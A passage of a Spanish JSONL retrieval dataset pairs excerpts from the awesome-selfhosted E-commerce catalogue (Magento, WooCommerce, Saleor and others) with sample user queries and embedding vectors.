0.06076, -0.11596, 0.02343, -0.00188, -0.0229, -0.10014, 0.00977, 0.074, -0.08418, -0.03519, 0.00394, 0.04663, 0.05711, -0.09084, 0.00946, 0.0128, -0.01987, 0.05853, 0.0267, 0.00663, 0.11904, 0.01956, 0.04709, 0.04661, -0.04514, 0.04021, 0.04418, 0.02899, 0.1992, -0.08557, -0.09979, -0.05247, -0.07098, 0.03335, 0.02946, 0.00556, 0.02718, 0.00053, -0.0409, -0.09901, 0.01927, 0.03118, -0.01626, -0.05162, 0.04104, 0.06867, 0.00986, 0.01099, -0.04677, -0.03141, -0.0169, 0.02782, 0.0579, 0.00202, 0.0317, -0.0588, 0.01782, -0.01592, -0.04447, 0.00779, 0.05326, 0.00585, 0.10992, -0.01656, -0.06331, -0.04297, -0.0144, -0.06912, 0.0656, 0.06424, 0.04706, -0.0171, 0.0315, 0.01055, -0.05111, 0.03341, 0.04648, -0.03941, -0.03759, -0.02462, 0.00946, -0.05784, 0.00208, 0.02425, 0.00319, -0.04117, 0.01911, 0.00389, -0.00956, -0.05175, 0.03663, -0.01273, 0.00559, -0.05014, -0.02795, 0.0594, 0.0171, -0.05717, -0.00074, -0.00749, -0.02657, -0.04307, -0.01145, -0.06196, 0.00395, 0.03804, -0.02479, 0.00302, 0.0595, 0.01375, 0.03401, -0.07811, -0.03373, -0.00422, -0.01034, -0.01438, -0.01912, -0.00231, -0.00146, -0.05038, 0.0343, 0.01535, -0.00631, -0.00895, 0.04938, 0.05312, 0.03191, 0.03973, 0.03459, 0.01397, 0.00609, -0.04098, -0.02892, -0.04493, -0.03691, -0.02471, -0.03692, 0.02213, 0.06651, -0.05145, -0.01796, -0.00716, 0.04132, 0.02944, -0.03752, -0.01724, -0.0419, -0.06034, -0.05709, -0.03139, -0.02091, -0.07411, 0.02301, -0.00643, 0.03666, -0.00911, 0.01535]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "con quΓ© puedo crear un marketplace que soporte miles de productos y mΓΊltiples inventarios?", "v": [0.06028, 0.07689, -0.17191, -0.11476, -0.03946, -0.04836, -0.00655, -0.01861, -0.27904, -0.22446, -0.08988, -0.05969, 0.09345, -0.06361, 0.02204, 0.04968, 0.00481, -0.24369, 0.03137, 0.05547, 0.06843, -0.08893, -0.14289, -0.0421, -0.15725, 0.02507, 0.08617, 0.00081, -0.15089, 0.09119, 0.00327, 0.0617, -0.01961, -0.05921, -0.06171, -0.13798, -0.0376, 0.07291, -0.06791, -0.0567, 0.02737, -0.10472, 0.0026, -0.09575, -0.03614, -0.01019, 0.03703, 0.05817, -0.08795, 0.06816, 0.01533, -0.12936, -0.14219, 0.01747, 0.09545, 0.0011, 0.1101, -0.03844, 0.08202, 0.01073, -0.08183, 0.05674, 0.01951, -0.04869, -0.05726, -0.06425, -0.10679, -0.01763, -0.02892, 0.01528, -0.07415, -0.03926, 0.04072, -0.10094, 0.01287, 0.09129, -0.01923, 0.05538, -0.00948, 0.03629, 0.047, 0.02604, 0.03409, 0.0206, 0.01986, -0.14962, -0.00211, 0.03451, -0.02253, -0.12612, 0.01803, -0.07028, -0.10567, 0.01977, -0.02403, -0.00278, 0.01413, -0.02424, -0.03191, 0.09033, -0.02468, 0.00603, -0.07294, 0.04245, -0.01312, 0.02311, 0.08342, -0.00876, -0.05201, 0.0011, 0.0095, -0.00474, -0.06308, -0.08114, 0.01323, 0.04333, -0.0498, -0.00158, 0.05545, 0.06049, 0.02455, 0.04763, -0.00494, 0.02825, 0.10435, -0.02077, 0.02494, 0.03382, 0.04111, -0.03492, 0.04968, 0.03335, 0.00641, -0.09568, 0.03227, 0.01907, -0.00147, -0.01455, -0.00326, -0.03314, 0.11185, 0.0001, -0.00042, -0.07576, 0.02898, -0.05604, -0.05906, -0.04319, -0.03302, 0.0533, 0.00408, 0.0609, -0.03904, 0.01958, -0.01778, -0.01188, 0.0246, -0.05281, 0.02443, 0.01237, -0.06491, 0.06493, -0.01673, 0.05037, -0.00932, -0.01358, -0.0573, -0.0266, 0.07585, 0.00989, -0.07041, 0.05629, 0.02102, -0.08901, -0.01789, -0.0298, -0.0133, -0.03484, 0.09282, -0.07343, -0.07069, -0.01032, -0.02412, 0.04211, 0.00016, -0.13111, -0.01991, 0.0207, 0.05735, 0.05324, -0.04567, 0.07593, -0.01624, -0.11554, 0.03539, -0.03561, 0.02138, 0.04124, 0.01862, -0.07459, -0.01307, 0.01925, -0.01217, -0.08022, 0.04682, 0.01356, -0.07323, 0.04711, -0.00301, 0.00034, 0.02844, -0.09161, 0.05733, -0.00161, -0.03842, -0.00939, -0.03015, -0.01904, 0.01193, -0.01654, 0.0169, 0.03401, 0.03649, 0.03839, -0.05045, 0.03061, 0.01005, 0.0079, 0.05651, 0.03435, -0.00161, -0.01363, -0.00747, -0.04076, 0.04297, 0.00171, 0.06465, -0.02405, 0.01824, 4e-05, 0.03258, 0.07603, -0.0671, -0.04126, -0.00666, -0.03735, -0.09136, 0.06328, -0.04841, -0.09897, -0.05944, 0.00307, 0.03176, -0.03658, 0.0385, -0.03595]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Aimeos β€” E-commerce framework for building custom online shops, market places and complex B2B applications scaling to billions of items with Laravel [LGPL-3.0/MIT, PHP]. Bagisto β€” Leading Laravel open source e-commerce framework with multi-inventory sources, taxation, localization, dropshipping and more exciting features [MIT, PHP]. CoreShop β€” E-commerce plugin for Pimcore [GPL-3.0, PHP]. Drupal Commerce β€” Popular e-commerce module for Drupal CMS, with support for dozens of payment, shipping, and shopping related modules [GPL-2.0, PHP]. EverShop β€” E-commerce platform with essential commerce features. Modular architecture and fully customizable [⚠, GPL-3.0, Docker/Nodejs]. Magento Open Source β€” Leading provider of open omnichannel innovation [OSL-3.0, PHP]. MedusaJs β€” Headless commerce engine that enables developers to create amazing digital commerce experiences [MIT, Nodejs]. Microweber β€” Drag and Drop CMS and online shop [MIT, PHP]. myCart β€” Shopping cart in 1 file (with support for payment by card or cryptocurrency) [⚠, MIT, Go/Docker].", "indexar": "cual es una alternativa libre a Magento para desarrollar tiendas B2B o marketplaces?", "v": [-0.11859, -0.00096, -0.04441, -0.01427, -0.2033, 0.00762, -0.10066, -0.04765, -0.30271, -0.12901, -0.09074, -0.05192, -0.01463, 0.07903, 0.06539, 0.03282, -0.07545, -0.20384, 0.06326, -0.05168, 0.08105, -0.06289, -0.10816, -0.0125, -0.07124, -0.09221, -0.08398, 0.00471, -0.15196, 0.20979, 0.01741, -0.1145, 0.02427, -0.07019, -0.03984, -0.08533, 0.09746, -0.00879, 0.00172, -0.08097, 0.00455, -0.15499, -0.04336, -0.0125, 0.05613, -0.07473, 0.05595, 0.0239, -0.10801, 0.03743, -0.05543, 0.01299, -0.04525, 0.02749, 0.13269, -0.0499, 0.06998, -0.03493, 0.08624, -0.0361, 0.00179, 0.0244, 0.08431, -0.05609, 0.0076, -0.04541, 0.01842, 0.09706, -0.0665, -0.00023, -0.05248, -0.05473, 0.01225, -0.01087, -0.13198, 0.13595, -0.06224, -0.00211, 0.01742, 0.02227, 0.07603, -0.02847, -0.0415, 0.10517, -0.01949, -0.1267, -0.00829, -0.03409, -0.03667, 0.01643, 0.05521, -0.0321, -0.07894, 0.00767, -0.00478, -0.12245, -0.01372, 0.00171, 0.02812, 0.08172, -0.05349, 0.05749, -0.08673, -0.04451, -0.02573, -0.04684, -0.00419, 0.08671, -0.06057, -0.02694, 0.02093, -0.01092, -0.03107, 0.03648, 0.05514, 0.00814, -0.00104, 0.03943, 0.04574, 0.08449, -0.11007, -0.02136, -0.04147, -0.08306, -0.00044, 0.11065, 0.02682, 0.05383, -0.0878, -0.02543, 0.04909, -0.03681, 0.04914, -0.03121, -0.0779, 0.01766, 0.08037, 0.02381, -0.02745, 0.03412, 0.01573, -0.04195, 0.02147, -0.00573, 0.08534, -0.04882, 0.02274, -0.02321, 0.01799, 0.05725, -0.03565, 0.04102, 0.00146, 0.07199, -0.01113, -0.06629, -0.05762, -0.06955, -0.02492, 0.09975, -0.03253, -0.00174, -0.03606, 0.0246, -0.02435, -0.03275, 0.00322, -0.02557, -0.07282, -0.03732, 0.01676, 0.03069, 0.03407, -0.10953, 0.06579, -0.02878, -0.00095, -0.07269, 0.06791, 0.02209, -0.03129, 0.04082, -0.06658, 0.03692, -0.03595, -0.07791, -0.01195, 0.0063, 0.02344, 0.10984, -0.04049, -0.02127, 0.00315, -0.07984, -0.03081, -0.01183, 0.01229, -0.06234, -0.04533, -0.03093, -0.10154, 0.0117, -0.02027, -0.01777, -0.05882, 0.00377, -0.05033, 0.02114, -0.01279, 0.05962, 0.00549, -0.05834, 0.05553, 0.04372, -0.03888, 0.01327, -0.00058, 0.03763, 0.0212, -0.01839, -0.00423, 0.01577, -0.02544, 0.00502, -0.0008, 0.07338, 0.0103, 0.06432, -0.05769, 0.04965, -0.0189, 0.01532, 0.00561, -0.02373, 0.00698, 0.00948, 0.00991, 0.03589, -0.01739, -0.04724, 0.0599, 0.02189, -0.04872, -0.02557, -0.04532, 0.0066, -0.12153, -0.01912, -0.06002, -0.02164, -0.11394, -0.02323, 0.03708, -0.02413, 0.05746, -0.00781]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "que programa puedo usar para vender en internet sin pagar licencias?", "v": [0.07691, 0.03529, -0.15326, -0.15796, -0.01765, -0.10435, -0.0284, -0.11657, -0.193, -0.11856, 0.04477, -0.23212, 0.06544, -0.08904, 0.03273, 0.05673, -0.01901, -0.15777, 0.20205, -0.01483, 0.04434, 0.07207, -0.01198, -0.10541, -0.08229, 0.11095, 0.06628, -0.12436, -0.10866, 0.12036, -0.09032, -0.02136, 0.09284, -0.06429, -0.01899, -0.02591, 0.04043, 0.09932, 0.19145, -0.02076, 0.16139, 0.04122, -0.02238, -0.07516, 0.00472, -0.0273, 0.03213, -0.04257, -0.0118, -0.07233, -0.01721, -0.03288, -0.1302, -0.09842, 0.12898, -0.06275, 0.02551, -0.10541, 0.01848, -0.01706, -0.02809, 0.03146, 0.05266, 0.01461, -0.03489, 0.08567, 0.07595, 0.06861, 0.00224, 0.03459, -0.01433, 0.04715, 0.05679, 0.01238, 0.00972, 0.01414, -0.05887, -0.08497, 0.05418, 0.00673, -0.00582, -0.04183, -0.01035, 0.0259, -0.05947, -0.03797, 0.0077, -0.09603, 0.05914, -0.00682, -0.00864, 0.10956, -0.01926, -0.03237, 0.08471, -0.07977, 0.07904, 0.0018, -0.01744, -0.02125, -0.03471, 0.09483, -0.07204, 0.02558, -0.06871, 0.06419, 0.13768, -0.05691, -0.09641, 0.04713, -0.03009, 0.00734, -0.12582, -0.05626, -0.02169, -0.00861, 0.05605, -0.02054, 0.04496, 0.0456, -0.02017, -0.01366, 0.06139, -0.0243, 0.11529, 0.05776, -0.01276, 0.20252, -0.11267, -0.02605, 0.00951, -0.00996, 0.02858, -0.02844, -0.05832, 0.0017, 0.01233, -0.04726, -0.04457, -0.01937, 0.05238, -0.01987, -0.05696, 0.05958, 0.03686, 0.02737, -0.05251, -0.06533, -0.07956, -0.08152, 0.029, 0.01068, -0.06487, 0.07193, -0.04204, 0.0209, -0.00693, -0.01847, -0.0004, 0.01778, -0.03122, 0.08164, 0.0226, -0.06565, 0.0129, 0.06357, -0.06409, 0.05888, 0.01253, 0.05207, 0.00092, 0.00605, 0.04108, -0.01387, 0.05636, 0.01342, -0.0503, -0.00908, -0.01408, -0.00112, -0.0499, 0.01505, -0.02064, -0.0143, -0.03075, 0.07191, -0.03614, 0.04758, -0.04372, 0.01495, -0.04291, -0.0058, 0.02819, 0.00514, 0.05755, -0.01023, -0.04832, 0.02377, 0.01853, -0.05009, -0.06501, 0.00571, -0.0403, 0.01159, 0.02384, -0.03474, 0.01818, 0.02926, 0.02236, 0.05831, -0.07338, -0.08152, 0.00845, -0.01903, -0.05274, 0.00899, 0.00056, -0.01639, -0.02808, 0.04195, 0.06592, 0.01554, -0.02738, 0.05615, 0.07628, -0.01243, 0.01217, 0.00389, 0.01553, 0.02084, -0.05176, 0.00257, -0.03801, -0.04501, -0.01542, -0.03049, -0.01016, 0.00208, -0.07243, 0.00288, -0.07589, 0.07132, 0.03617, -0.00845, 0.01675, -0.02346, -0.07658, -0.05849, 0.00827, 0.00591, -0.02193, 0.03877, 0.0331, 0.00713, 0.03722, 0.06928]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "con que puedo montar una tienda online de productos fΓ­sicos?", "v": [0.05087, -0.06161, -0.137, -0.06159, -0.09635, -0.00783, 0.01779, 0.09161, -0.12848, -0.17611, -0.01036, 0.05578, 0.05876, -0.04658, 0.02514, -0.05302, 0.06845, -0.17019, 0.09877, 0.03306, 0.02408, -0.10849, -0.15122, -0.10287, -0.03625, 0.06366, 0.09266, -0.08186, -0.16883, 0.15723, 0.06602, 0.01874, 0.04655, -0.02851, -0.01849, -0.16909, -0.04024, -0.03239, 0.08039, -0.01976, 0.04467, -0.00392, 0.02106, -0.09714, -0.00223, 0.12259, 0.02916, -0.05242, -0.07272, 0.06874, 0.07712, -0.03262, -0.05245, -0.04211, 0.01234, -0.0772, 0.12849, 0.09719, 0.1897, 0.03504, 0.03309, 0.02376, 0.13628, 0.01142, 0.01495, 0.04609, -0.04064, 0.00348, -0.10227, -0.08574, -0.11324, -0.10853, -0.13339, -0.12777, -0.05081, 0.08343, -0.00392, 0.07513, 0.04108, -4e-05, 0.02885, 0.04193, 0.05537, 0.0655, 0.04117, -0.13483, -0.07793, 0.02658, 0.01421, -0.02967, -0.05319, 0.01091, -0.00886, -0.10365, -0.00593, -0.052, 0.01266, -0.02325, -0.04667, 0.05187, -0.07796, 0.11811, 0.02304, -0.0125, -0.01337, -0.06665, -0.0557, 0.03518, -0.00586, 0.01081, 0.02194, -0.06158, -0.11409, -0.05198, 0.01003, 0.04277, 0.03443, -0.01692, -0.06863, 0.13202, -0.0408, 0.09664, 0.04205, -0.02082, 0.03944, 0.04253, 0.08919, 0.05019, -0.02378, -0.02786, 0.03991, 0.02922, 0.1092, -0.07053, 0.00089, -0.0162, -0.04104, -0.00374, 0.01269, 0.02549, 0.03771, -0.09752, -0.07573, 0.04013, 0.0445, -0.03877, 0.01763, -0.00949, -0.01984, 0.02466, 0.05188, 0.1575, 0.00867, 0.01995, 0.03558, 0.04352, -0.00998, -0.03787, 0.06727, 0.04416, -0.06678, 0.15002, 0.00986, -0.01742, -0.0584, -0.01527, -0.07661, 0.04338, -0.00043, 0.0025, -0.03066, 0.05643, 0.00233, -0.03594, 0.02003, 0.11745, -0.0706, 0.04725, 0.05975, 0.01046, -0.03119, 0.00625, 0.00949, 0.0346, -0.06561, -0.04062, -0.01317, 0.00369, -0.04351, 0.05917, -0.03827, -0.02133, -0.04679, 0.03786, 0.01036, -0.0325, 0.01805, 0.07497, 0.04752, -0.02662, -0.04762, -0.06666, 0.00613, -0.02903, 0.0022, -0.00796, -0.02744, 0.01946, -0.02413, -0.03022, -0.02152, -0.11159, 0.01227, -0.04496, -0.00966, -0.02776, 0.03924, 0.01836, -0.04091, 0.03063, -0.00235, 0.04502, 0.0591, 0.07876, 0.01677, 0.02084, 0.03065, -0.00522, -0.00234, 0.0219, -0.03541, -0.11068, 0.0097, -0.07262, 0.00478, -0.01686, 0.04761, 0.04537, -0.03829, 0.04432, 0.00154, 0.03546, 0.01395, -0.01277, -0.00823, -0.02046, -0.0696, -0.00508, -0.07213, -0.06281, -0.07615, -0.01444, -0.0369, -0.0172, -0.02578, 0.0324]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: Open Source POS β€” Open Source Point of Sale is a web based point of sale system [MIT, PHP]. OpenCart β€” Shopping cart solution [GPL-3.0, PHP]. PrestaShop β€” Fully scalable e-commerce solution [OSL-3.0, PHP]. Pretix β€” Ticket sales platform for events [AGPL-3.0, Python/Docker]. s-cart β€” E-commerce website for individuals and businesses, built on top of Laravel Framework [MIT, PHP]. Saleor β€” Django based open-sourced e-commerce storefront [BSD-3-Clause, Docker/Python]. Shopware Community Edition β€” PHP based open source e-commerce software made in Germany [MIT, PHP]. Solidus β€” A free, open-source ecommerce platform that gives you complete control over your store [BSD-3-Clause, Ruby/Docker]. Spree Commerce β€” Spree is a complete, modular & API-driven open source e-commerce solution for Ruby on Rails [BSD-3-Clause, Ruby]. Sylius β€” Symfony2 powered open source full-stack platform for eCommerce [MIT, PHP]. Thelia β€” Thelia is an open source and flexible e-commerce solution [LGPL-3.0, PHP]. Vendure β€” A headless commerce framework [MIT, Nodejs].", "indexar": "cual es una alternativa libre a los sistemas de caja registradora web?", "v": [-0.01193, 0.05261, -0.10002, -0.0722, -0.04475, -0.15262, -0.00837, -0.06519, -0.16021, -0.04915, -0.13392, -0.25559, -0.04596, -0.00119, 0.17734, 0.03069, 0.06566, -0.04587, 0.11615, -0.08893, -0.07868, -0.035, -0.02296, -0.04635, -0.1146, -0.03863, 0.02778, -0.05161, -0.11147, 0.08216, 0.05561, 0.00285, 0.14068, -0.03027, -0.06986, 0.09717, 0.10772, 0.01852, 0.083, -0.07635, 0.04694, 0.0048, 0.02066, 0.07791, 0.02259, -0.04411, -0.00321, 0.00913, -0.02074, -0.00579, -0.11769, -0.05227, -0.10479, -0.00286, 0.09635, -0.1031, 0.15171, -0.10315, 0.02887, -0.0898, -0.07288, 0.07574, -0.00737, -0.03408, 0.0289, 0.00449, -0.07885, -0.03025, -0.02655, 0.01605, 0.09305, -0.01701, 0.03557, -0.08902, -0.02493, 0.07248, -0.03405, 0.0343, -0.05888, 0.01605, 0.02511, -0.15405, 0.02165, 0.12218, -0.01561, -0.05457, 0.02488, -0.07289, 0.02139, 0.02555, 0.11895, 0.00868, 0.00118, 0.12758, 0.09203, -0.1333, -0.01801, 0.11158, -0.00928, 0.00044, 0.01538, 0.06174, -0.11213, -0.00961, 0.01516, -0.03521, 0.01129, 0.0442, -0.00573, -0.04837, 0.03362, 0.06264, -0.03578, -0.01155, -0.02157, 0.01979, 0.03268, 0.03553, 0.01663, -0.03532, -0.0791, -0.00396, -0.0374, -0.0677, 0.05983, 0.02689, 0.02273, 0.0216, -0.03554, 0.06593, 0.04531, -0.04428, -0.08852, -0.04228, -0.04911, -0.02232, 0.00605, 0.00818, 0.0766, 0.05901, -0.02282, 0.03513, -0.05225, -0.05481, 0.03206, -0.05099, 0.06641, -0.07077, -0.06603, -0.06016, -0.12385, 0.01983, -0.03387, 0.07552, -0.05233, 0.06811, -0.02281, -0.0666, -0.06533, 0.02376, -0.01276, -0.01161, 0.02375, 0.07875, -0.0452, 3e-05, -0.02897, -0.03641, -0.01293, 0.02456, 0.05986, 0.10228, 0.07081, -0.0888, 0.07115, -0.06372, -0.06148, -0.1137, 0.0453, -0.04897, -0.06501, 0.03391, -0.03045, -0.01508, -0.04233, -0.04792, 0.01184, -0.01313, 0.03062, 0.08438, 0.00182, 0.05526, -0.13607, -0.0496, 0.00459, 0.04837, -0.01493, -0.124, 0.01255, 0.0071, -0.07697, -0.00026, 0.03255, -0.08329, -0.04589, 0.06018, -0.03039, -0.01285, 0.06962, 0.05434, 0.01871, 0.02432, 0.05916, -0.04364, -0.06455, -0.0025, 0.03695, 0.00722, -0.00399, -0.08575, 0.06144, 0.02196, 0.03588, 0.01962, 0.00296, -0.00342, 0.01746, 0.0488, -0.03525, -0.00475, -0.03772, -0.05666, -0.00777, 0.04038, 0.02043, 0.02298, 0.03182, -0.00047, -0.0354, -0.00495, 0.02202, 0.12024, -0.04575, -0.03345, -0.04488, -0.0356, -0.11543, -0.01271, -0.03309, -0.07742, -0.04215, 0.0351, 0.00651, -0.00955, 0.02802, 0.02925]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "que programa hay para montar una tienda online desde cero", "v": [0.0181, -0.05141, -0.16465, -0.04745, -0.1258, -0.03212, -0.01118, 0.06264, -0.13156, -0.08411, -0.03967, -0.06083, 0.06232, -0.14843, 0.05606, -0.02058, 0.06612, -0.18775, 0.17249, 0.04641, -0.02244, 0.02146, 0.03191, -0.1416, -0.01463, 0.07093, 0.01492, -0.16976, -0.14727, 0.09633, 0.09117, -0.05939, 0.11037, -0.03094, 0.08193, -0.18603, 0.0968, -0.09993, 0.0669, -0.03303, 0.06694, -0.01348, 0.02754, 0.03738, 0.00303, 0.01661, 0.17415, -0.03237, -0.01148, 0.03438, 0.04888, -0.02059, -0.05827, -0.08367, 0.06815, -0.05328, 0.05548, 0.04326, 0.10238, -0.04772, 0.02083, 0.08312, 0.09758, -0.02165, -0.00521, 0.02042, 0.0505, 0.04711, -0.16301, -0.0108, -0.08638, -0.02973, -0.00795, -0.07515, -0.03584, 0.04531, 0.05565, -0.01732, 0.00176, -0.08024, 0.05122, -0.00314, 0.04744, 0.1196, -0.05226, -0.0588, 0.02624, 0.02049, -0.0011, 0.04663, -0.11645, 0.10296, -0.03067, -0.05611, 0.0419, -0.1606, 0.11915, 0.06194, 0.02294, 0.05694, -0.0767, -0.01655, -0.01483, 0.07363, 0.01232, 0.04702, -0.01792, 0.02922, -0.01289, 0.0548, 0.04716, -0.06408, -0.08019, -0.0307, -0.02883, 0.01761, 0.07898, 0.04327, 0.02385, 0.0481, -0.13975, 0.13704, 0.00132, -0.00081, 0.03724, 0.01946, 0.01418, 0.09319, -0.03047, -0.02584, 0.00153, 0.01311, 0.02426, -0.05972, -0.02767, -0.00163, -0.07196, 0.01083, -0.06393, 0.01249, -0.00446, -0.0416, -0.03362, 0.04191, 0.03158, -0.06284, 0.01944, -0.06983, 0.00597, 0.0907, 0.0386, 0.17013, 0.00228, 0.04673, -0.02633, 0.00943, -0.00414, -0.01286, 0.03367, 0.01046, -0.01355, 0.03934, 0.02684, -0.10451, 0.00649, -0.03377, -0.0575, 0.08211, 0.07473, 0.04094, -0.03586, 0.07855, 0.01896, -0.05434, 0.00067, 0.11801, -0.04958, -0.02497, 0.02993, 0.01136, -0.04845, 0.0166, 0.05436, 0.0433, -0.04184, -0.01091, 0.01364, 0.01435, -0.01625, 0.04406, -0.04681, -0.0333, -0.08362, 0.08608, 0.01775, 0.02667, 0.01748, 0.02731, 0.06125, 0.01192, -0.11483, -0.05385, 0.04116, -0.00672, 0.0006, 0.06079, -0.0216, 0.0033, 0.03068, 0.07095, -0.05551, -0.10077, -0.05391, -0.02299, 0.0144, -0.03458, -0.00217, 0.01195, 0.01358, 0.03662, -0.01963, -0.01111, 0.02065, 0.06892, -0.00712, -0.02687, 0.01845, 0.04256, 0.01767, 0.01366, -0.01887, -0.12367, 0.0075, -0.06797, -0.01029, -0.04348, 0.05892, 0.04449, -0.05198, -0.02372, -0.01544, 0.06424, 0.02825, -0.01943, 0.02375, -0.0329, -0.06672, 0.0158, -0.03447, -0.03472, -0.06589, -0.01455, -0.05799, -0.03993, -0.02209, 0.02808]} -{"tipo": "pregunta", "herramienta": "E-commerce", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / E-commerce", "tema": "e-commerce", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / E-commerce: WooCommerce β€” WordPress based e-commerce solution [GPL-3.0, PHP].", "indexar": "con que puedo crear un catΓ‘logo de productos fΓ‘cil de usar", "v": [-0.0422, 0.03087, -0.23126, -0.0999, -0.01542, -0.12588, 0.03902, 0.11024, -0.17189, -0.18393, -0.16153, -0.12334, -0.10236, -0.07015, -0.06753, -0.00414, 0.02651, -0.19488, -0.0016, 0.04076, 0.06239, -0.05774, -0.1707, -0.08261, -0.0699, 0.03526, 0.13672, -0.08346, -0.14103, 0.16849, -0.07886, 0.05052, 0.02855, -0.0535, -0.07954, -0.08201, 0.03085, 0.02114, -0.01654, 0.05796, 0.04382, -0.02175, -0.043, 0.03635, -0.04332, 0.12629, 0.07627, -0.00921, -0.1291, 0.10893, 0.09604, -0.11803, -0.15752, 0.05225, 0.06219, -0.10258, 0.00338, -0.01296, 0.03167, -0.02247, -0.00994, 0.06251, 0.06527, 0.0362, -0.13544, -0.09646, -0.12612, 0.0061, -0.05999, 0.03764, -0.03165, -0.07824, -0.04011, -0.05322, 0.04801, 0.07855, -0.06411, -0.00709, 0.05084, 0.01135, 0.04434, -0.01273, 0.06253, -0.08034, 0.00832, -0.08537, 0.05532, 0.05821, 0.04746, -0.15711, 0.02247, -0.08169, -0.00872, -0.06458, 0.04686, -0.01493, 0.05847, -0.05598, 0.00445, 0.00104, -0.06203, 0.01643, -0.00137, 0.0803, 0.03124, -0.05653, 0.01107, 0.00532, -0.10574, -0.01645, -0.05122, -0.03361, -0.08844, -0.10088, 0.00336, 0.04402, -0.00502, -0.00618, -0.01083, 0.07177, 0.05535, -0.01891, 0.00013, -0.0303, 0.11011, 0.03051, 0.05971, 0.01039, -0.05724, 0.03003, 0.04369, 0.03093, -0.03433, -0.1082, -0.00219, -0.01089, 0.00423, 0.01545, 0.07525, 0.01458, 0.04579, 0.00491, -0.06582, -0.00988, -0.01319, -0.03759, -0.0634, -0.02476, 0.0241, 0.04534, 0.03834, 0.01073, 0.0165, -0.00984, 0.00925, 0.02333, -0.01053, -0.04018, 0.05552, -0.00724, -0.05796, 0.08886, -0.01879, 0.08433, 0.03301, -0.05439, -0.04728, -0.02838, 0.00703, 0.01375, -0.01006, 0.07635, 0.0416, -0.06324, 0.03963, 0.01064, -0.034, 0.00504, 0.03707, -0.02388, -0.07307, -0.02461, -0.06859, 0.00541, 0.01724, -0.07468, 0.03089, 0.02697, 0.0328, 0.04617, -0.08578, 0.08523, 0.02355, 